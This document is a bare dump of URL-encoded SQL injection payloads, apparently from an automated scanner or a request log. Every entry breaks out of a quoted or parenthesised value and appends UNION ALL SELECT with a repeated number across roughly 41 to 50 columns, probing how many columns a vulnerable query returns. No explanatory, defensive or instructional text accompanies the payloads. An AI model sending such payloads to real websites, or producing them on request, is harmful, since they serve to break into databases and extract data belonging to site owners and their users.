-7117%22%29%29%20UNION%20ALL%20SELECT%204966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966%2C4966--%20 -8641%22%29%29%20UNION%20ALL%20SELECT%203978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978%2C3978--%20 -9994%22%29%29%20UNION%20ALL%20SELECT%201325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325%2C1325--%20 -1420%22%29%29%20UNION%20ALL%20SELECT%207201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201%2C7201--%20 -6378%22%29%29%20UNION%20ALL%20SELECT%205286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286%2C5286--%20 -3273%22%29%29%20UNION%20ALL%20SELECT%204156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156%2C4156--%20 -6323%22%29%29%20UNION%20ALL%20SELECT%206116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116%2C6116--%20 -8330%22%29%29%20UNION%20ALL%20SELECT%206343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343%2C6343--%20 -5934%22%29%29%20UNION%20ALL%20SELECT%205746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746--%20 -9361%22%29%29%29%20UNION%20ALL%20SELECT%201702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702%2C1702--%20 -5904%22%29%29%29%20UNION%20ALL%20SELECT%201574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574--%20 -5881%22%29%29%29%20UNION%20ALL%20SELECT%208490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490%2C8490--%20 -2019%22%29%29%29%20UNION%20ALL%20SELECT%204339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339%2C4339--%20 -7150%22%29%29%29%20UNION%20ALL%20SELECT%202732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732%2C2732--%20 -2122%22%29%29%29%20UNION%20ALL%20SELECT%203612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612%2C3612--%20 -4529%22%29%29%29%20UNION%20ALL%20SELECT%207440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440%2C7440--%20 -8388%22%29%29%29%20UNION%20ALL%20SELECT%202350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350%2C2350--%20 -1640%22%29%29%29%20UNION%20ALL%20SELECT%203765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765%2C3765--%20 -1415%22%29%29%29%20UNION%20ALL%20SELECT%201481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481%2C1481--%20 -7066%22%20UNION%20ALL%20SELECT%209595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595--%20 -5692%22%20UNION%20ALL%20SELECT%204262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262%2C4262--%20 -9766%22%20UNION%20ALL%20SELECT%205916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916%2C5916--%20 -7731%22%20UNION%20ALL%20SELECT%206744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744--%20 -2887%22%20UNION%20ALL%20SELECT%201440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440%2C1440--%20 -4662%22%20UNION%20ALL%20SELECT%204937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937--%20 -4538%22%20UNION%20ALL%20SELECT%201117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117%2C1117--%20 -5102%22%20UNION%20ALL%20SELECT%208966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966%2C8966--%20 -2769%22%20UNION%20ALL%20SELECT%208237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237%2C8237--%20 -6981%22%20UNION%20ALL%20SELECT%206258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258%2C6258--%20 -1284%25%27%29%20UNION%20ALL%20SELECT%202040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040%2C2040--%20 -3037%25%27%29%20UNION%20ALL%20SELECT%209463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463--%20 -1534%25%27%29%20UNION%20ALL%20SELECT%201803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803%2C1803--%20 -6226%25%27%29%20UNION%20ALL%20SELECT%202534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534--%20 -7216%25%27%29%20UNION%20ALL%20SELECT%204456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456%2C4456--%20 -1412%25%27%29%20UNION%20ALL%20SELECT%206267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267%2C6267--%20 -9059%25%27%29%20UNION%20ALL%20SELECT%209248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248--%20 -3683%25%27%29%20UNION%20ALL%20SELECT%203994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994--%20 -1949%25%27%29%20UNION%20ALL%20SELECT%206802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802%2C6802--%20 -2331%25%27%29%20UNION%20ALL%20SELECT%204575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575%2C4575--%20 -5137%25%27%29%29%20UNION%20ALL%20SELECT%207491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491%2C7491--%20 -1054%25%27%29%29%20UNION%20ALL%20SELECT%208204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204--%20 -8074%25%27%29%29%20UNION%20ALL%20SELECT%207641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641%2C7641--%20 -5047%25%27%29%29%20UNION%20ALL%20SELECT%206446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446%2C6446--%20 -9783%25%27%29%29%20UNION%20ALL%20SELECT%201872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872%2C1872--%20 -8714%25%27%29%29%20UNION%20ALL%20SELECT%209354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354%2C9354--%20 -8012%25%27%29%29%20UNION%20ALL%20SELECT%204236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236--%20 -5224%25%27%29%29%20UNION%20ALL%20SELECT%206047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047%2C6047--%20 -6145%25%27%29%29%20UNION%20ALL%20SELECT%209442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442--%20 -9888%25%27%29%29%20UNION%20ALL%20SELECT%209411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411%2C9411--%20 -8644%25%27%29%29%29%20UNION%20ALL%20SELECT%202300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300%2C2300--%20 -2163%25%27%29%29%29%20UNION%20ALL%20SELECT%202430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430--%20 -2591%25%27%29%29%29%20UNION%20ALL%20SELECT%202209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209%2C2209--%20 -2420%25%27%29%29%29%20UNION%20ALL%20SELECT%204785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785--%20 -4871%25%27%29%29%29%20UNION%20ALL%20SELECT%205144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144--%20 -6788%25%27%29%29%29%20UNION%20ALL%20SELECT%208375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375--%20 -4514%25%27%29%29%29%20UNION%20ALL%20SELECT%207915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915%2C7915--%20 -2685%25%27%29%29%29%20UNION%20ALL%20SELECT%203468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468%2C3468--%20 -6580%25%27%29%29%29%20UNION%20ALL%20SELECT%205784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784%2C5784--%20 